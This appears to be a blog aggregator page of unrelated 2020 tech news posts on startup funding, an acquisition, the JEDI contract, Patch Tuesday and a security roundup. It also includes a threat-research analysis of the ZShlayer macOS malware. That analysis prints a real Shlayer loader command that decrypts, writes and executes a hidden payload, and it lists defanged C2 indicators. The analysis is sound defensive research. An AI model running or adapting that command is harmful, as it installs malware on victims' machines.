Xometry raises $75M Series E to expand custom manufacturing marketplace

/0 Comments/in /by

When companies need to find manufacturers to build custom parts, it’s not always an easy process, especially during a pandemic. Xometry, a seven-year-old startup based in Maryland, has built an online marketplace where companies can find manufacturers across the world with excess capacity to build whatever they need. Today, the company announced a $75 million Series E investment to keep expanding the platform.

T. Rowe Price Associates led the investment, with participation from new firms Durable Capital Partners LP and ArrowMark Partners. Previous investors also joined the round, including BMW i Ventures, Greenspring Associates, Dell Technologies Capital, Robert Bosch Venture Capital, Foundry Group, Highland Capital Partners and Almaz Capital . Today’s investment brings the total raised to $193 million, according to the company.

Company CEO and co-founder Randy Altschuler says Xometry fills a need by providing a digital way of putting buyers and manufacturers together with a dash of artificial intelligence to put the right combination together. “We’ve created a marketplace using artificial intelligence to power it, and provide an e-commerce experience for buyers of custom manufacturing and for suppliers to deliver that manufacturing,” Altschuler told TechCrunch.

The kind of custom pieces that are facilitated by this platform include mechanical parts for aerospace, defense, automotive, robotics and medical devices — what Altschuler calls mission-critical parts. Being able to put companies together in this fashion is particularly useful during COVID-19 when certain regions might have been shut down.

“COVID has reinforced the need for distributed manufacturing and our platform enables that by empowering these local manufacturers, and because we’re using technology to do it, as COVID has unfolded […] and as continents have shut down, and even specific states in the United States have shut down, our platform has allowed customers to autocorrect and shift work to other locations,” he explained

What’s more, companies could take advantage of the platform to manufacture critical personal protective equipment. “One of the beauties of our platform was when COVID hit customers could come to our platform and suddenly access this tremendous amount of manufacturing capacity to produce this much-needed PPE,” he said.

Xometry makes money by facilitating the sale between the buyer and producer. They help set the price and then make money on the difference between the cost to produce and how much the buyer was willing to pay to have it done.

They have relationships with 5,000 manufacturers located throughout the world and 30,000 customers using the platform to build the parts they need. The company currently has around 350 employees, with plans to use the money to add more to keep enhancing the platform.

Altschuler says from a human perspective, he wants his company to have a diverse workforce because he never wants to see people being discriminated against for whatever reason, but he also says as a company with an international market, having a diverse workforce is also critical to his business. “The more diversity that we have within Xometry, the more we’re able to effectively market to those folks, sell to those folks and understand how they utilize technology. We’re just going to better understand our customer set as we [build a more diverse workforce],” he said.

As a Series E-stage company, Altschuler does not shy away from the IPO question. In fact, he recently brought in new CFO Jim Rallo, who has experience taking a company public. “The market that we operate in is so large, and there’s so many opportunities for us to serve both our customers and our suppliers, and we have to be great for both of them. We need capital to do that, and the public markets can be an efficient way to access that capital and to grow our business, and in the end that’s what we want to do,” he said.

Xometry acquires European on-demand manufacturing marketplace Shift

B2B marketing company Metadata.io raises $6.5M

/0 Comments/in /by

Metadata.io announced today that it has raised $6.5 million in Series A funding.

It’s been more than four years since I wrote about the startup’s $2 million seed funding. At the time, co-founder and CEO Gil Allouche described the product as helping business-to-business marketers target their ads as people who resemble their existing sales leads.

Since then, the company has launched its product in general availability, and Allouche told me yesterday that it’s become “really the middleware for the sales and marketing stack.”

“It doesn’t just … give you insights, it skips the human as the bottleneck of execution for marketing [operations],” Allouche said, adding that this makes marketing teams more efficient while also eliminating much of the drudgery. “If you’re a Don Draper who’s really good at creative or content, you should spend your time on that and not in an Excel spreadsheet.”

At the same time, ad targeting remains a key part of the company’s capabilities. For example, its new product MetaMatch allows advertisers to build and target custom audiences on Facebook, LinkedIn and programmatic display.

Allouche also said that demand has increased “quite significantly” since the beginning of the pandemic. That’s counter to larger digital ad trends, but he noted that B2B companies still need to reach customers, and many of the old tools — like in-person events — are now off the table.

Metadata leadership team

Gil Allouche and the Metadata leadership team

In addition, he said that Metadata’s proprietary database of 1.4 billion customer profiles have given it an additional advantage in the face of privacy regulation and ad-tracking restrictions.

The platform has been used by companies including Zoom, Drift, Pendo, Udacity, and Vonage.

The new funding was led by Resolute Ventures, with participation from Greycroft, York IE, Stormbreakers, Eloqua founder Mark Organ, Segment founder Ilya Volodarsky and others.

Metadata isn’t another marketing technology,” Organ said in a statement. “From the origin of the company transforming marketing operations by eliminating tedious manual work, to today, creating a category that transcends demand gen, it is enabling the autonomous marketer to be a reality. It is the marketer that’s needed for the future.”

5 VCs agree: COVID-19 reshaped adtech and martech

Coming Out of Your Shell: From Shlayer to ZShlayer

/0 Comments/in /by

Earlier this year, we discussed how threat actors have been turning to scripting languages as a preferred means of both dropping malware and executing payloads. That trend has continued with some interesting innovations in response to the static detection signatures now widely in use both by Apple and other vendors. A recent variant of the Shlayer malware follows Apple’s lead in preferring Zsh to Bash as its default shell language and employs a novel encoding method to avoid detection. In this post, we describe this variant and show how it can be decoded to reveal the telltale Shlayer signature.

Didn’t We Just Hear About Shlayer?

Shlayer is perhaps the most talked about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple’s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory. That might well suggest that Apple’s Notarization checks are static rather than dynamic as the telltale Shlayer code is only evident once the packed binary runs:

sh -c “tail -c +1381 "/Volumes/Install/Installer.app/Contents/Resources/main.png" | openssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass "pass:0.6effariGgninthgiL0.6" && chmod 777 /tmp/ZQEifWNV2l && /tmp/ZQEifWNV2l "/Volumes/Install/Installer.app/Contents/MacOS/pine" && rm -rf /tmp/ZQEifWNV2l”

The classic Shlayer technique is clearly evident here: passing encrypted and password-protected code to openssl and then writing that out as a payload to the /tmp folder.

But Shlayer has been up to other tricks since June of 2020 that have been helping it avoid the static signatures employed by most vendors. Although bypassing Apple’s Notarization checks is obviously a headline grabber, this new variant of Shlayer utilizes heavily obfuscated Zsh scripts and is in fact far more prolific in the wild. Let’s take a look at how this new variant works.

Inside the New ZShlayer Variant

Whereas earlier versions of Shlayer like Shlayer.a came as shell script executables on a removable .DMG disk image, the new ZShlayer malware goes back to using a standard Apple application bundle inside the .DMG.

In place of a Mach-O in the MacOS folder, we instead find this heavily obfuscated Zsh script (only partially shown in the image below):

In the Resources folder, we find two base64 encoded text files.

The entire bundle is codesigned, but it is has not been notarized, indicating that the malware is either intended as a payload for 10.14 or earlier installations or that victims will have to be socially engineered to override the Notarization check. Unlike many other samples we have seen since Catalina was released last year, this one did not include graphical instructions to help the user bypass Apple’s built-in security checks.

This particular sample (c561d62c786c757a660c47d133b6d23e030a40c4aa08aebe44b8c4a7711da580), which dates back to early August, has already had its certificate revoked by Apple.

Despite that, due to the use of the Zsh obfuscation, it’s not particularly well-recognized by static signature scanners on VirusTotal, even as of today.

Decoding the First Stage, Zsh Script Payload

In the following, we’ll use this as for our example:

05b0a4a31f38225d5ad9d133d08c892645639c4661b3e239ef2094381366cb62

But the same general method should work across all ZShlayer samples noted at the end of this post.

The Zsh script located in the bundle’s MacOS folder may seem fairly impenetrable at first glance, as indeed it is intended to:

Seeing from the shebang that it’s a shell script, however, immediately tells us that we can isolate each command by introducing a line break at every semicolon.

In BBEdit or similar text editor, we can simply search and replace every semicolon with a semicolon and newline:

Looking toward the end of that output, we can clearly see now where the variable definitions end and the execution logic begins, at line 164:

Note in particular the variable TWm, defined on the penultimate line and executed at line 164. This variable name will prove key as we try to deobfuscate the code.

In order to do that, we’ll first save this modified version of the script with the linebreaks to local disk so that we can use it as input to a python script for decoding. Our script will first of all replace all the variable names with the actual unicode values. Now the line that gets executed looks something like this:

We can echo that code on the command line and print out the unicode in plain text using printf. The full ZShlayer_decode.py script is available here. Here’s what all the above looks like.

And the output:

ZShlayer Second-Stage Payload

You’ll notice from the output that the decoded Zsh script takes as input only the smaller of the two encoded files from the Resources folder; in this case, the smaller file is called “tun_kibitzers_Babbitt”. If we echo the output from this decoded script to the command line, we’ll see why:

Our ZShlayer script decodes into a trademark Shlayer Bash script which now takes the larger file (here called “profanations_detraction”) and outputs it to a newly-created application bundle in the /tmp folder. Classic Shlayer behavior.

Let’s take that script and comment out the last two lines so that we can get the output while still preventing execution:

The unzipped Player.app now in the the /tmp folder looks like a duplicate of the one on the original disk image, with the same executable name as the parent and another Bash script in the Resources folder also called “tun_kibitzers_Babbitt” (in this case). However, note the size is different:

Decoding the new script shows that it drops and executes yet another layer of Bash shell scripting. Here’s the head and tail (sandwiched between the two is a huge chunk of base64):

If you followed (or want to check out) our earlier Scripting Macs with Malice post, you’ll recognize that this is the Shlayer.d variant we wrote about there. The output of

"$(_m "$_t" "$_y")"

is almost identical to the Shlayer.d sample we wrote about earlier; the most significant difference being a new URL from which to retrieve the final payload:

http[:]//dqb2corklaq0k[.]cloudfront[.]net/
13[.]226[.]23[.]203

The final payload from this point depends on the context of the executing device. As can be seen above, the script gathers OS version, a session UID and machine ID, all of which it posts to the server for processing.

The server, which appears to have been up for at least two months, is not recognized as malicious on VirusTotal and is currently active with a 200 status code.

As Shlayer payloads have been discussed in detail by other researchers, we refer further analysis of the final payload to already published work such as here and here.

How Prevalent is ZShlayer in the Wild?

Searching for ZShlayer on VirusTotal reveals a large number of individual samples and shows that this variant has been active since late June 2020. As of today, our latest retrohunt showed 172 samples. Some of the parent DMGs of these samples have a reputation score of 0/58 on VT.

Conclusion

The ZShlayer variant of the Shlayer malware on top of the recent Shlayer campaign abusing Apple’s Notarization service is clear evidence that these threat actors are continuing to evolve and are pursuing multiple campaigns against macOS users. A multi-engined behavioral AI solution that can detect malware based on its behavior rather than relying solely on file characteristics continues to be the best way to protect your macOS fleet. If you would like to see how SentinelOne can help protect your business, contact us today or request a free demo.

Indicators of Compromise

ZShlayer Scripts
269d5f15da3bc3522ca53a3399dbaf4848f86de35d78c636a78336d46c23951c
e3292268c1d0830e76c3e80b4ea57921b9171027e07f064ef3b867b6d0450191
93ff20ff59d4e82e9c0e3b08037c48886dc54b8ed37c19894e0a65c1af8612f6
c561d62c786c757a660c47d133b6d23e030a40c4aa08aebe44b8c4a7711da580
16885c2443b610d80b30828b1445ca326adb727c48f06d073e4dcb70fe3e5c2e
1bc5d3cb3d885fad8230e01dc5f86145d16ed5552a0fa8725689635b96b681e1

Parent DMGs
f6cb7f9593d85f0cd1e81d5b9f520b74d9bf5e829206cefe05b956c0f7638c28
3e20c0b2979a368c7d38cf305f1f60693375165bb76150ad80dbd34e7e0550ed
c319761789afb6aa9cddadf340dfa2d4d659e4b420d6dfde9640cdc4c1d813b7
823c4d39b0d93a1358b4fa02539868944ce15df91f78a1142be26edf07a64a5a
45d50559f73e7c12f1d9aa06283182cb67ac953d285f044e77447569ca8a278c
f94c8712dd7716cfeac79e6e59fdca07db4452c5d239593f421f97246ee8ef41

Domains
http[:]//dqb2corklaq0k[.]cloudfront[.]net/
13[.]226[.]23[.]203

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Google Cloud launches its Business Application Platform based on Apigee and AppSheet

/0 Comments/in /by

Unlike some of its competitors, Google Cloud has recently started emphasizing how its large lineup of different services can be combined to solve common business problems. Instead of trying to sell individual services, Google is focusing on solutions and the latest effort here is what it calls its Business Application Platform, which combines the API management capabilities of Apigee with the no-code application development platform of AppSheet, which Google acquired earlier this year.

As part of this process, Google is also launching a number of new features for both services today. The company is launching the beta of a new API Gateway, built on top of the open-source Envoy project, for example. This is a fully managed service that is meant to make it easier for developers to secure and manage their API across Google’s cloud computing services and serverless offerings like Cloud Functions and Cloud Run. The new gateway, which has been in alpha for a while now, offers all the standard features you’d expect, including authentication, key validation and rate limiting.

As for its low-code service AppSheet, the Google Cloud team is now making it easier to bring in data from third-party applications thanks to the general availability to Apigee as a data source for the service. AppSheet already supported standard sources like MySQL, Salesforce and G Suite, but this new feature adds a lot of flexibility to the service.

With more data comes more complexity, so AppSheet is also launching new tools for automating processes inside the service today, thanks to the early access launch of AppSheet Automation. Like the rest of AppSheet, the promise here is that developers won’t have to write any code. Instead, AppSheet Automation provides a visual interface, that, according to Google, “provides contextual suggestions based on natural language inputs.” 

“We are confident the new category of business application platforms will help empower both technical and line of business developers with the core ability to create and extend applications, build and automate workflows, and connect and modernize applications,” Google notes in today’s announcement. And indeed, this looks like a smart way to combine the no-code environment of AppSheet with the power of Apigee .

Google acquires AppSheet to bring no-code development to Google Cloud

Progress snags software automation platform Chef for $220M

/0 Comments/in /by

Progress, a Boston-area developer tool company, boosted its offerings in a big way today when it announced it was acquiring software automation platform Chef for $220 million.

Chef, which went 100% open source last year, had annual recurring revenue (ARR) of $70 million from the commercial side of the house. Needless to say, Progress CEO Yogesh Gupta was happy to bring the company into the fold and gain not only that revenue, but a set of highly skilled employees, a strong developer community and an impressive customer list.

Gupta said that Chef fits with his company’s acquisition philosophy. “This acquisition perfectly aligns with our growth strategy and meets the requirements that we’ve previously laid out: a strong recurring revenue model, technology that complements our business, a loyal customer base and the ability to leverage our operating model and infrastructure to run the business more efficiently,” he said in a statement.

Chef CEO Barry Crist offered a typical argument for an acquired company; that Progress offered a better path to future growth, while sending a message to the open-source community and customers that Progress would be a good steward of the startup’s vision.

“For Chef, this acquisition is our next chapter, and Progress will help enhance our growth potential, support our Open Source vision, and provide broader opportunities for our customers, partners, employees and community,” Crist said in a statement.

Chef’s customer list is certainly impressive, and includes tech industry stalwarts like Facebook, IBM and SAP, as well as non-tech companies like Nordstrom, Alaska Airlines and Capital One.

The company was founded in 2008 and had raised $105 million, according to Crunchbase data. It hadn’t raised any funds since 2015, when it raised a $40 million Series E led by DFJ Growth. Other investors along the way included Battery Ventures, Ignition Partners and Scale Venture Partners.

The transaction is expected to close next month, pending normal regulatory approvals.

Chef goes 100% open source

Hasura raises $25 million Series B and adds MySQL support to its GraphQL service

/0 Comments/in /by

Hasura, a service that provides developers with an open-source engine that provides them a GraphQL API to access their databases, today announced that it has raised a $25 million Series B round led by Lightspeed Venture Partners. Previous investors Vertex Ventures US, Nexus Venture Partners, Strive VC and SAP.iO Fund also participated in this round.

The new round, which the team raised after the COVID-19 pandemic had already started, comes only six months after the company announced its $9.9 million Series A round. In total, Hasura has now raised $36.5 million.

“We’ve been seeing rapid enterprise traction in 2020. We’ve wanted to accelerate our efforts investing in the Hasura community and our cloud product that we recently launched and to ensure the success of our enterprise customers. Given the VC inbound interest, a fundraise made sense to help us step on the gas pedal and give us room to grow comfortably,” Hasura co-founder and CEO Tanmai Gopal told me.

In addition to the new funding, Hasura also today announced that it has added support for MySQL databases. Until now, the company’s service only worked with PostgreSQL databases.

Rajoshi Ghosh, co-founder and COO (left) and Tanmai Gopal, co-founder and CEO (right).

Rajoshi Ghosh, co-founder and COO (left) and Tanmai Gopal, co-founder and CEO (right). Image Credits: Hasura

As the company’s CEO and co-founder Tanmai Gopal told me, MySQL support has long been at the top of the most requested features by the service’s users. Many of these users — who are often in the healthcare and financial services industry — are also working with legacy systems they are trying to connect to modern applications and MySQL plays an important role there, given how long it has been around.

In addition to adding MySQL support, Hasura is also adding support for SQL Server to its lineup, but for now, that’s in early access.

“For MySQL and SQL Server, we’ve seen a lot of demand from our healthcare and financial services / fin-tech users,” Gopal said. “They have a lot of existing online data, especially in these two databases, that they want to activate to build new capabilities and use while modernizing their applications.

Today’s announcement also comes only a few months after the company launched a fully managed cloud service for its service, which complements its existing paid Pro service for enterprises.

“We’re very impressed by how developers have taken to Hasura and embraced the GraphQL approach to building applications,” said Gaurav Gupta, partner at Lightspeed Venture Partners and Hasura board member. “Particularly for front-end developers using technologies like React, Hasura makes it easy to connect applications to existing databases where all the data is without compromising on security and performance. Hasura provides a lovely bridge for re-platforming applications to cloud-native approaches, so we see this approach being embraced by enterprise developers as well as front-end developers more and more.”

The company plans to use the new funding to add support for more databases and to tackle some of the harder technical challenges around cross-database joins and the company’s application-level data caching system. “We’re also investing deeply in company building so that we can grow our GTM and engineering in tandem and making some senior hires across these functions,” said Gopal.

Hasura launches managed cloud service for its open-source GraphQL API platform

The $10B JEDI contract is locked, loaded and still completely stuck

/0 Comments/in /by

The other day I took a moment to count the number of stories we’ve done on TechCrunch on the DoD’s $10 billion, decade-long, winner-take-all, JEDI cloud contract. This marks the 30th time we’ve written about this deal over the last two years, and it comes after a busy week last week in JEDI cloud contract news.

That we’re still writing about this is fairly odd if you consider the winner was announced last October when the DoD chose Microsoft, but there is no end in sight to the on-going drama that is this procurement process.

Government contracts don’t typically catch our attention at TechCrunch, but this one felt different early on. There was the size and scope of the deal of course. There was the cute play on the “Star Wars” theme. There was Oracle acting like a batter complaining to the umpire before the first pitch was thrown. There was the fact that everyone thought Amazon would win until it didn’t.

There was a lot going on. In fact, there’s still a lot going on with this story.

Oracle doth protest too much

Let’s start with Oracle, which dispatched CEO Safra Catz to the White House in April 2018 even before the RFP had been written. She was setting the stage to complain that the deal was going to be set up to favor Amazon, something that Oracle alleged until the day Microsoft was picked the winner.

Catz had been on the Trump transition team and so had the ear of the president. While the president certainly interjected himself in this process, it’s not known how much influence that particular meeting might have had. Suffice to say that it was only the first volley in Oracle’s long war against the JEDI contract procurement process.

It would include official complaints with the Government Accountability Office and a federal lawsuit worth not coincidentally $10 billion. It would claim the contract favored Amazon. It would argue that the one-vendor approach wasn’t proper. It would suggest that because the DoD had some former Amazon employees helping write the RFP, that it somehow favored Amazon. The GAO and two court cases found otherwise, ruling against Oracle every single time.

It’s worth noting that the Court of Appeals ruling last week indicated that Oracle didn’t even meet some of the basic contractual requirements, all the while complaining about the process itself from the start.

Oracle loses $10B JEDI cloud contract appeal yet again

Amazon continues to press protests

Nobody was more surprised that Amazon lost the deal than Amazon itself. It still believes to this day that it is technically superior to Microsoft and that it can offer the DoD the best approach. The DoD doesn’t agree. On Friday, it reaffirmed its choice of Microsoft. But that is not the end of this, not by a long shot.

Amazon has maintained since the decision was made last October that the decision-making process had been tainted by presidential interference in the process. They believe that because of the president’s personal dislike of Amazon CEO Jeff Bezos, who also owns the Washington Post, he inserted himself in the process to prevent Bezos’ company from winning that deal.

In January, Amazon filed a motion to stop work on the project until this could all be sorted out. In February, a judge halted work on the project until Amazon’s complaints could be heard by the court. It is September and that order is still in place.

In a blog post on Friday, Amazon reiterated its case, which is based on presidential interference and what it believes is technical superiority. “In February, the Court of Federal Claims stopped performance on JEDI. The Court determined AWS’s protest had merit, and that Microsoft’s proposal likely failed to meet a key solicitation requirement and was likely deficient and ineligible for award. Our protest detailed how pervasive these errors were (impacting all six technical evaluation factors), and the Judge stopped the DoD from moving forward because the very first issue she reviewed demonstrated serious flaws,” Amazon wrote in the post.

DoD reaffirms Microsoft has won JEDI cloud contract, but Amazon legal complaints still pending

Microsoft for the win?

Microsoft on the other hand went quietly about its business throughout this process. It announced Azure Stack, a kind of portable cloud that would work well as a field operations computer system. It beefed up its government security credentials.

Even though Microsoft didn’t agree with the one-vendor approach, indicating that the government would benefit more from the multivendor approach many of its customers were taking, it made clear if those were the rules, it was in it to win it — and win it did, much to the surprise of everyone, especially Amazon.

Yet here we are, almost a year later and in spite of the fact that the DoD found once again, after further review, that Microsoft is still the winner, the contract remains in limbo. Until that pending court case is resolved, we will continue to watch and wait and wonder if this will ever be truly over, and the JEDI cloud contract will actually be implemented.

Even after Microsoft wins, JEDI saga could drag on

Microsoft Patch Tuesday, Sept. 2020 Edition

/0 Comments/in /by

Microsoft today released updates to remedy nearly 130 security vulnerabilities in its Windows operating system and supported software. None of the flaws are known to be currently under active exploitation, but 23 of them could be exploited by malware or malcontents to seize complete control of Windows computers with little or no help from users.

The majority of the most dangerous or “critical” bugs deal with issues in Microsoft’s various Windows operating systems and its web browsers, Internet Explorer and Edge. September marks the seventh month in a row Microsoft has shipped fixes for more than 100 flaws in its products, and the fourth month in a row that it fixed more than 120.

Among the chief concerns for enterprises this month is CVE-2020-16875, which involves a critical flaw in the email software Microsoft Exchange Server 2016 and 2019. An attacker could leverage the Exchange bug to run code of his choosing just by sending a booby-trapped email to a vulnerable Exchange server.

“That doesn’t quite make it wormable, but it’s about the worst-case scenario for Exchange servers,” said Dustin Childs, of Trend Micro’s Zero Day Initiative. “We have seen the previously patched Exchange bug CVE-2020-0688 used in the wild, and that requires authentication. We’ll likely see this one in the wild soon. This should be your top priority.”

Also not great for companies to have around is CVE-2020-1210, which is a remote code execution flaw in supported versions of Microsoft Sharepoint document management software that bad guys could attack by uploading a file to a vulnerable Sharepoint site. Security firm Tenable notes that this bug is reminiscent of CVE-2019-0604, another Sharepoint problem that’s been exploited for cybercriminal gains since April 2019.

Microsoft fixed at least five other serious bugs in Sharepoint versions 2010 through 2019 that also could be used to compromise systems running this software. And because ransomware purveyors have a history of seizing upon Sharepoint flaws to wreak havoc inside enterprises, companies should definitely prioritize deployment of these fixes, says Alan Liska, senior security architect at Recorded Future.

Todd Schell at Ivanti reminds us that Patch Tuesday isn’t just about Windows updates: Google has shipped a critical update for its Chrome browser that resolves at least five security flaws that are rated high severity. If you use Chrome and notice an icon featuring a small upward-facing arrow inside of a circle to the right of the address bar, it’s time to update. Completely closing out Chrome and restarting it should apply the pending updates.

Once again, there are no security updates available today for Adobe’s Flash Player, although the company did ship a non-security software update for the browser plugin. The last time Flash got a security update was June 2020, which may suggest researchers and/or attackers have stopped looking for flaws in it. Adobe says it will retire the plugin at the end of this year, and Microsoft has said it plans to completely remove the program from all Microsoft browsers via Windows Update by then.

Before you update with this month’s patch batch, please make sure you have backed up your system and/or important files. It’s not uncommon for Windows updates to hose one’s system or prevent it from booting properly, and some updates even have known to erase or corrupt files.

So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.

The Good, the Bad and the Ugly in Cybersecurity – Week 36

/0 Comments/in /by

The Good

A Colorado man named Bryan Connor Herrell, who worked as a moderator on the now defunct Darknet site “AlphaBay Market”, was sentenced to 11 years in prison by the U.S. District Court.

The site, which was taken down in a joint operation by the FBI along with Thai and Canadian police, served as a marketplace for buyers and sellers of guns, stolen identity information, credit card numbers and other illicit materials. At one time, AlphaBay was the world’s largest online drug marketplace. As a moderator, Herrell helped settle disputes between buyers and sellers. He was clearly dedicated to his work, helping to resolve over 20,000 such disputes.

Herrell’s capture came as a result of the site’s founder and admin Alexandre Cazes being arrested in Thailand in 2017. Cazes, who was subsequently found dead in his prison cell only a few days later, kept a laptop full of incriminating evidence. The FBI had seized the device and were able to retrieve troves of information related to the site’s infrastructure and staff, including the involvement of Herrell. While Herrell’s trial took several years to conclude, the sentence is severe and should serve as warning to others interested in exploring the murky paths of the criminal underground.

Other good news this week comes from Facebook and Twitter, both of which suspended several accounts affiliated with Russian State actors. The accounts belonged to “PeaceData”, a fake news website publishing misleading articles about world politics.

The two social networks said they started an investigation into accounts associated with the site after they received a tip from the FBI earlier this summer. The information was passed also to an independent research body Graphika, which confirmed that the site and associated social media assets were linked to the infamous Russian troll farm “Internet Research Agency” (IRA).

Hopefully, this action is a sign of social media platforms starting to take a more determined stand against fake news and online manipulation.

The Bad

The Parliament of Norway, also known as “The Storting”, was the target of a cyber attack this week that breached the email accounts of several MPs and members of staff. Emails belonging to the Conservative party (Høyre) were among those hacked, but it is unknown at this point if the account of PM Erna Solberg or any government ministers were affected. The opposition Labour party (Arbeiderpartiet) email account was also hacked, suggesting the attack was conducted by an external perpetrator.

“This has been a significant attack,” said Marianne Andreassen, the parliament’s non-elected chief administrator. “Today’s threat situation is challenging, and IT security is something that we are always reviewing. New measures to reinforce security in the Storting are continually being assessed,” she added.

The Parliament has reported the incident to Norwegian police security service (PST), which then tweeted that they were investigating the case. The next Norwegian parliamentary election is scheduled to be held a year from now, in September 2021, and the fears are that this attack might be a prelude to foreign interference in next year’s election.

The Ugly

Still with politics and cybercrime, the Twitter account of the personal website of Indian Prime Minister Narendra Modi has also been hacked this week. The perpertators posted a series of tweets appealing to his 2.5 million followers to donate to the PM National Relief Fund with Bitcoin.

The tweets read, “I appeal to you all to donate generously to PM National Relief Fund for Covid-19, Now India begin with cryptocurrency.”

Subsequent tweets revealed the identity of the hackers to be a group called “John Wick” (referencing the movie franchise starring Keanu Reeves), which was accused earlier this week of hacking a famous Indian E-commerce website “Paytm Mall” and demanding a ransom. It appears that the hacking group wanted to clear its name and so hacked a high-profile Twitter account and used it to shout to the world that they were not to blame for the Paytm Mall hack.

Twitter is investigating the breach of the Indian PM’s account (the account has been reset since, and the hackers’ tweets deleted), which follows in the steps of the much publicized incident in July when hackers gained access to around 130 celebrity accounts, using them to tweet in concert in an attempt to get people to “donate” to a special Bitcoin wallet. This is another reminder that social media accounts of national and political leaders are high-value assets and need to be protected as such to reduce the risk of manipulation and misconduct on a national or even international level.

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Teemyco creates virtual offices so you can grab a room and talk with colleagues

/0 Comments/in /by

Meet Teemyco, a Stockholm-based startup that wants to reproduce office interactions in a virtual environment. The company wants to foster spontaneous interactions and casual collaboration with a room-based interface. Each employee moves from one room to another just like in a physical office.

If you’re no longer working from an office, chances are you rely heavily on email, Slack, Microsoft Teams, Zoom, Google Meet or a combination of all those tools. While those tools work perfectly fine for what they’re designed to achieve, many companies feel like important information is getting lost. It’s harder to bump into a colleague next to the coffee machine and ask a quick question.

With Teemyco, each person is working in a virtual room. By default, you work in the lobby. You can consider it as an open space with multiple desks. When you want to get together for a planned or unplanned meeting, you can pull someone from the lobby and create another room.

In that room, you can start an audio call or a video call. You can see your colleagues in the corner of your screen and stay focused on a document at the same time, or you can put a video call in full screen. When someone is done, they can leave the room.

Those interactions are less formal than what you get with video-conferencing services. You don’t have to send a link to a Zoom room, you don’t have to send a calendar invite. People hop in and hop out.

If you’re working on something important, you can move to a focus room so that you don’t get interrupted every 15 minutes. Other people won’t be able to pull you from your virtual desk. If you have to run some errands, you can also put yourself in a room that says you’re not there — those rooms can act as a status.

Teemyco also helps you work next to your favorite colleague. You can create a room and use a walkie-talkie feature for quick interactions throughout the day. And, of course, you can create a break room for non-work-related discussions.

Teemyco is still a young company. The product is only available in beta. The company raised a $1 million seed round led by Luminar Ventures with Antler, Gazella and various business angels also participating.

It’s also not going to work for all companies. I’m not sure it scales well for a company with hundreds of employees, for instance. Introverts might not be fans of real-time communication either.

If you’re a remote-first company, you know that it’s important to have a culture of transparency. And written information is always more transparent than video conferences.

And yet, depending on your corporate culture, something like Teemyco can be useful. It can augment information stored in shared documents and internal communication tools.

It’s an interesting product that proves that the inevitable debate between physical offices and remote teams is not a binary problem. There is some granularity, and companies can adjust the knob depending on specific needs.